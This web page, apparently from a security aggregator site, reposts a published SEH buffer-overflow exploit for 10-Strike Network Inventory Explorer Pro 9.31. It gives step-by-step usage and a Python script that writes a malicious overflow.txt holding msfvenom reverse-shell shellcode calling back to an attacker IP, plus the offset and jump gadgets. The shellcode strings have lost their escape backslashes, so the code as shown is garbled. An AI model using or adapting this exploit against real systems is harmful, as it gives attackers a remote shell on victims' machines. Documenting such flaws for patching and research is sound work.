Home Tools Exploits & CVE's 10-Strike Network Inventory Explorer Pro 9.31 Buffer Overflow

10-Strike Network Inventory Explorer Pro 9.31 Buffer Overflow

November 4, 2021

704

Authored by ro0k

10-Strike Network Inventory Explorer Pro version 9.31 suffers from a buffer overflow vulnerability.

# Exploit Title: 10-Strike Network Inventory Explorer Pro 9.31 - Buffer Overflow (SEH)
# Date: 2021-10-31
# Exploit Author: ro0k
# Vendor Homepage: https://www.10-strike.com/
# Software Link: https://www.10-strike.com/networkinventoryexplorer/network-inventory-pro-setup.exe
# Version: 9.31
# Tested on: Windows 10 x64 Education 21H1 Build 19043.928 

# Proof of Concept:
# 1.Run python2 exploit.py to generate overflow.txt
# 2.Transfer overflow.txt to the Windows 10 machine
# 3.Setup Netcat listener on attacker machine 
# 4.Open 10-Strike Network Inventory Explorer Pro
# 5.Select Computers tab from the uppermost set of tabs
# 6.Select From Text File option
# 7.Open overflow.txt
# 8.Receive reverse shell connection on attacker machine! 

#!/usr/bin/env python
import struct

charslist = ""               
badchars = [0x00,0x09,0x0a,0x0d,0x3a,0x5c]         

for i in range (0x00, 0xFF+1):
        if i not in badchars:   
                charslist += chr(i) 

#msfvenom -p windows/shell_reverse_tcp LHOST=10.2.170.242 LPORT=443 EXITFUNC=thread -f c -a x86 -b "x00x09x0ax0dx3ax5c"
shellcode = ("xd9xc8xd9x74x24xf4x58x33xc9xbbxc6xbcxd3x19xb1"
"x52x83xc0x04x31x58x13x03x9exafx31xecxe2x38x37"
"x0fx1axb9x58x99xffx88x58xfdx74xbax68x75xd8x37"
"x02xdbxc8xccx66xf4xffx65xccx22xcex76x7dx16x51"
"xf5x7cx4bxb1xc4x4ex9exb0x01xb2x53xe0xdaxb8xc6"
"x14x6exf4xdax9fx3cx18x5bx7cxf4x1bx4axd3x8ex45"
"x4cxd2x43xfexc5xccx80x3bx9fx67x72xb7x1exa1x4a"
"x38x8cx8cx62xcbxccxc9x45x34xbbx23xb6xc9xbcxf0"
"xc4x15x48xe2x6fxddxeaxcex8ex32x6cx85x9dxffxfa"
"xc1x81xfex2fx7axbdx8bxd1xacx37xcfxf5x68x13x8b"
"x94x29xf9x7axa8x29xa2x23x0cx22x4fx37x3dx69x18"
"xf4x0cx91xd8x92x07xe2xeax3dxbcx6cx47xb5x1ax6b"
"xa8xecxdbxe3x57x0fx1cx2ax9cx5bx4cx44x35xe4x07"
"x94xbax31x87xc4x14xeax68xb4xd4x5ax01xdexdax85"
"x31xe1x30xaexd8x18xd3xdbx1ex88xd1xb4x1cxccx14"
"xfexa8x2ax7cx10xfdxe5xe9x89xa4x7dx8bx56x73xf8"
"x8bxddx70xfdx42x16xfcxedx33xd6x4bx4fx95xe9x61"
"xe7x79x7bxeexf7xf4x60xb9xa0x51x56xb0x24x4cxc1"
"x6ax5ax8dx97x55xdex4ax64x5bxdfx1fxd0x7fxcfxd9"
"xd9x3bxbbxb5x8fx95x15x70x66x54xcfx2axd5x3ex87"
"xabx15x81xd1xb3x73x77x3dx05x2axcex42xaaxbaxc6"
"x3bxd6x5ax28x96x52x7axcbx32xafx13x52xd7x12x7e"
"x65x02x50x87xe6xa6x29x7cxf6xc3x2cx38xb0x38x5d"
"x51x55x3exf2x52x7c")

#pattern_offset.rb -l 250 -q 41316841
offset = 213

#nasm > jmp short 8
nseh = "xebx06x90x90"
junk = "A" * (offset - len(nseh))

#0x61e012f6 : pop edi # pop ebp # ret  |  {PAGE_EXECUTE_READ} [sqlite3.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v3.12.2 (C:Program Files (x86)10-Strike Network Inventory Explorer Prosqlite3.dll)
seh = struct.pack("<I", 0x61e012f6)

#metasm > sub esp,0x10
subesp10="x83xecx10"
payload = shellcode

buffer = junk + nseh + seh + subesp10 + payload

f = open("overflow.txt", "w")
f.write(buffer)
f.close()

10-Strike Network Inventory Explorer Pro 9.31 Buffer Overflow

Follow us on Instagram @thecyberpost

EDITOR PICKS

Zope 5.9 Command Injection

SAP Cloud Connector 2.16.1 Missing Validation

Cacti 1.2.26 Remote Code Execution

POPULAR POSTS

ESET NOD32 Antivirus 17.1.11.0 Unquoted Service Path

Restaurant Reservation System Patches Easy-to-Exploit XSS Bug

Sniffle – A Sniffer For Bluetooth 5 And 4.X LE

POPULAR CATEGORY

Microsoft HTTP Protocol Stack Remote Code Execution

Backdoor.Win32.Coredoor.10.a Authentication Bypass / Code Execution

WordPress SuperStoreFinder 6.1 CSRF / Shell Upload